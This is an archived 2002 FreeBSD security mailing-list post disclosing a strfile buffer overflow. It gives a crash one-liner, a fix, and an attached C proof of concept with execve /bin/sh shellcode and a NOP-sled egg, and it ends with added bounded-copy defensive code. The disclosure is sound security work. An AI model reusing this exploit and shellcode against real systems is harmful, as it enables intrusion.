From owner-freebsd-security Sun May 5 14:33:30 2002
Delivered-To: freebsd-security@freebsd.org
Message-ID: <20020505213314.8762.qmail@uwdvg007.cms.usa.net>
Date: Sun, 05 May 2002 22:33:14 +0100
From: ReDeeMeR
Subject: Buffer overflow in /usr/games/strfile
Sender: owner-freebsd-security@FreeBSD.ORG

Hi,

Below is an advisory for a vulnerable buffer in the /usr/games/strfile binary which can be overflowed. I emailed this information to security-officer@freebsd.org on 28/04/02 and am yet to receive a reply. The reason I am posting this so early is that it is not really a major security risk (the binary file in question is not suid), but it is a practice of bad coding so I felt it my duty to make you aware of it. Also find attached my proof of concept code.
Thanks,
-ReDeeMeR-

--begin paste--

-=[ g0tr00t.net advisory ]=-

FreeBSD /usr/games/strfile buffer overflow
ReDeeMeR (redeemer@g0tr00t.net)
http://www.g0tr00t.net
http://bse.die.ms/~redeemer/releases/ReDeeMeR/advisories/strfilexp.txt

-=[ Date discovered ]=-

24/04/02

-=[ Discovered by ]=-

ReDeeMeR (redeemer@g0tr00t.net)

-=[ Outline ]=-

FreeBSD /usr/games/strfile contains a vulnerable buffer which can be overflowed. The games package is NOT installed by default. The strfile binary is NOT suid (4755), thus the security risk here is not great.

-=[ Impact ]=-

No extra privileges can be gained.

-=[ Affected ]=-

Successfully tested on FreeBSD 4.5-RELEASE; suspected vulnerability on ALL FreeBSD machines which ship this software.

-=[ Vendor Status ]=-

FreeBSD (http://www.freebsd.org) contacted on 28/04/02. No reply after 7 days, so this advisory was released on the grounds that it is not a major security issue. Advisory released on 05/05/02.

-=[ Description ]=-

/usr/games/strfile ("strfile" hereafter) is vulnerable to a standard buffer overflow. The problem exists due to insufficient checking of command line input. The vulnerability exists in a poorly utilised strcpy() call (found on line 310 of strfile.c) which copies from an unchecked buffer:

    (void) strcpy(Outfile, *argv);

Thus, a large input (greater than the allocated buffer space) will cause strfile to segfault. This in turn can lead to the execution of arbitrary commands. A user can cause strfile to crash by inputting a string of length equal to or greater than 1069 bytes, and an input of equal to or greater than 1088 bytes in length will cause the eip of strcpy() to be overwritten with our input. This can be further investigated with the use of gdb, although I am not going to paste gdb output in this advisory.
To reproduce this bug, execute the following command:

    FreeBSD$ /usr/games/strfile `perl -e 'print "A" x 1069'`

-=[ Proof of concept ]=-

Proof of concept code can be located at:
http://bse.die.ms/~redeemer/releases/ReDeeMeR/exploits/strfilexp.c

If the program is successfully exploited, the terminal output should look something like this:

    bash-2.05a$ uname -a
    FreeBSD 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Sat Apr 20 14:14:37 BST 2002 redeemer@:/usr/src/sys/compile/TOX i386
    bash-2.05a$ id
    uid=31337(redeemer) gid=31337(redeemer) groups=31337(redeemer), 0(wheel)
    bash-2.05a$ ./strfilexp
    ReDeeMeR's proof of concept code for /usr/games/strfile
    Using return addr:      0xbfbffb0c
    Buffer size:            2000
    $ id
    uid=31337(redeemer) gid=31337(redeemer) groups=31337(redeemer), 0(wheel)
    $

*Notice that no extra privileges have been gained (due to strfile NOT being suid)*

-=[ Fix ]=-

A suggested fix was sent by me to FreeBSD to use strncpy() instead of strcpy(). Replace

    (void) strcpy(Outfile, *argv);

with:

    (void) strncpy(Outfile, *argv, sizeof(Outfile) - 1);
    Outfile[sizeof(Outfile) - 1] = '\0';

(strncpy() takes the destination first, then the source, then the byte count, and it does not NUL-terminate the destination when the source fills it, hence the explicit terminator.)

FreeBSD are yet to respond to my e-mail, but I will assume that they received it and have implemented an update in strfile.c within the FreeBSD-current branch.

-=[ Greets ]=-

Thanks to:
The Itch - For various mentoring and for hosting g0tr00t.net.
keoki - Someone to collaborate/compete with.
Chawmp - " " " " "

Greets: #g0tr00t, #ch0wn, #Turbo-IRC, #NeXT.

--end paste--

--- attached file: strfilexp.c ---

/* Proof of concept code for /usr/games/strfile [28/04/02]
 * Does not gain root shell, merely a proof of concept code
 * Tested on FreeBSD4.5-RELEASE
 * Find the advisory at
 * http://bse.die.ms/~redeemer/releases/ReDeeMeR/advisories/strfilexp.txt
 *
 * redeemer@g0tr00t.net
 * http://www.g0tr00t.net
 * http://bse.die.ms/~redeemer/legal.shtml applies to this file.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define MOO 2000   /* RET size */
#define LEN 2048   /* EGG size */
#define NOP 0x90

/* FreeBSD execve shellcode */
char shellcode[] =
    "\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b"
    "\x08\x89\x43\x0c\x50\x8d\x53\x08\x52\x53"
    "\xb0\x3b\x50\xcd\x80\xe8\xe4\xff\xff\xff"
    "/bin/sh";

int main(void)
{
    char *buff, *egg, *ptr;
    long *addr_pointer, addr;
    int bsize = MOO, eggsize = LEN, get_sp = (int)&get_sp, i;

    buff = malloc(bsize);
    egg = malloc(eggsize);

    printf("ReDeeMeR's proof of concept code for /usr/games/strfile\n");
    printf("Using return addr: \t0x%x\n", get_sp);
    printf("Buffer size: \t\t%d\n", bsize);

    /* fill the argument buffer with the guessed return address */
    ptr = buff;
    addr_pointer = (long *)ptr;
    for (i = 0; i < bsize; i += 4) {
        *(addr_pointer++) = get_sp;
    }

    /* build the egg: NOP sled followed by the shellcode */
    ptr = egg;
    for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) {
        *(ptr++) = NOP;
    }
    for (i = 0; i < strlen(shellcode); i++) {
        *(ptr++) = shellcode[i];
    }

    buff[bsize - 1] = '\0';
    egg[eggsize - 1] = '\0';

    /* export the egg in the environment, then run strfile with the overlong argument */
    memcpy(egg, "EGG=", 4);
    putenv(egg);
    execl("/usr/games/strfile", "strfile", buff, NULL);
    return(0);
}
/* EOF */
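As an added example (not the advisory's code and not strfile.c itself): a bounded replacement for the strcpy() call the advisory describes, which rejects an oversized argument instead of overflowing or silently truncating, plus a check that shows why the suggested strncpy() substitute needs explicit NUL termination. OUTFILE_SIZE is an assumption, since the advisory does not quote the real size of Outfile.

```c
#include <stddef.h>
#include <string.h>
/* Assumed buffer size: the advisory does not state sizeof(Outfile) from strfile.c. */
#define OUTFILE_SIZE 1024

/* Bounded replacement for "(void) strcpy(Outfile, *argv);".
 * Rejects any argument that would not fit together with its NUL and always
 * leaves dst NUL-terminated. Returns 0 on success, -1 when rejected. */
static int set_outfile(char *dst, size_t dstsize, const char *arg)
{
    size_t n = 0;
    if (dst == NULL || dstsize == 0 || arg == NULL)
        return -1;
    while (n < dstsize && arg[n] != '\0')   /* bounded scan: never reads past dstsize */
        n++;
    if (n == dstsize) {                     /* no room for the terminator: reject */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, arg, n + 1);                /* n bytes plus the NUL */
    return 0;
}

/* The strncpy() pitfall behind the advisory's suggested fix: even with the
 * correct argument order, strncpy(dst, src, dstsize) leaves dst without a
 * terminator whenever strlen(src) >= dstsize. Returns 1 if terminated, else 0. */
static int strncpy_terminated(size_t dstsize, const char *src)
{
    char dst[OUTFILE_SIZE];
    size_t i;
    if (dstsize > sizeof(dst))
        return 0;
    strncpy(dst, src, dstsize);
    for (i = 0; i < dstsize; i++)
        if (dst[i] == '\0')
            return 1;
    return 0;
}

/* Constructed input: arglen 'A' bytes, like the advisory's perl one-liner.
 * Returns set_outfile()'s verdict for that argument against an OUTFILE_SIZE buffer. */
static int try_arg(size_t arglen)
{
    static char arg[4096];
    char outfile[OUTFILE_SIZE];
    if (arglen >= sizeof(arg))
        return -1;
    memset(arg, 'A', arglen);
    arg[arglen] = '\0';
    return set_outfile(outfile, sizeof(outfile), arg);
}
```

With this check in place the advisory's 1069- and 1088-byte inputs are refused before any copy happens, and the process exits with a usage error instead of a corrupted stack.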